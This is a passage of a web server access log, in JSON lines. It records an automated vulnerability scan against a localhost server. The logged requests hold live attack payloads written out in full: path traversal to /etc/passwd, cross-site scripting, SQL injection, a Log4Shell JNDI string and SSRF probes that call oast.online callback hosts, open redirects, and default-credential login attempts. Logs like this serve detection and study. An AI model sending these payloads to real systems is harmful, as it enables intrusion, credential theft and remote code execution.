+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"username=showdoc&password=123456&v_code=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /server/index.php?s=/api/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appspec.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://ca28q98smpvbk9ig07h0iiinsi6hyiek9.oast.online/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adserve/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"email=springbird@qq.com&password=springbird&remeber=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authorization.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/welcome/default/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /////%5C;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"username=${jndi:ldap://${hostName}.ca28q98smpvbk9ig07h051ssy8nnrph7m.oast.online/test}&password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sample-apps/hello/%2f/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/nobody/Machine.cgi?action=get_capability HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"username=dd' or extractvalue(0x0a,concat(0x0a,810663301*872821376))#&password=dd&submit=+%B5%C7+%C2%BC+\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?m=member&f=login_save HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"type=url&data=http%3A%2F%2Fca28q98smpvbk9ig07h03dqbciqzmnr5g.oast.online%2F&xmlaction=preview&node=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appspec.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adserver/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.prod.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proftpd.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.078","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bolt/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"csrf_token={{csrf_token}}&username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1/admin/airflow/login", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /camunda/app/welcome/default/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KFpYcr2YTioWQGEoER0GBUJma HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /carbon/admin/login_action.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openx/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.back%3Cimg%20src=x%20onerror=alert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/start/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/systemstatus_inc_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/test/test.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftb.imagegallery.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.production.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/products HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status?full HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:07:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Reports/Pages/Folder.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} 